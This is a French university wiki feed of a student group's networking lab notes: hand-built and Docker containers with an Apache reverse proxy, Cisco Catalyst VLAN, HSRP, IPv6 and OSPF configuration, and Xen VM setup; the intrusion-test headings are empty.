&lt;br /&gt;
* &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN &lt;br /&gt;
* &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
* &amp;lt;code&amp;gt;HH&amp;lt;/code&amp;gt; dans la partie IPv6 par '''C1''' à '''CB''' suivant le groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60HH::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60HH::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès wifi ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
* '''REMARQUE''' Nous n'avons pas eu à nous occuper des points '''6.3''', '''6.4''' et '''6.5''' du sujet&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de données ====&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49088</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49088"/>
				<updated>2018-12-21T15:07:27Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* 3.4 Le routage de site (IPv6) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
* Sujet : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html Lien - rex.plil.fr]&lt;br /&gt;
&lt;br /&gt;
== Déroulement des Séances ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Séance 1 : 26/11/2018===&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage réseau IPV4 routé en deux sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage du réseau IPV4 non routée en sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
===Séance 2 : 27/11/2018===&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
====Mise en place du routeur et connexion à celui ci====&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
====Configuration du routeur : Configuration des ports====&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
====Mise en place de la machine virtuelle====&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
 xl create Dionysos.cfg&lt;br /&gt;
 xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/ssh/sshd_config nous décommentons la ligne : &lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Ainsi nous pouvons nous connecter en ssh sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
 ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
 xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
===Séance 3 : 10/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Config Routeur 3560====&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
====Mise en place des partitions pour la VM====&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
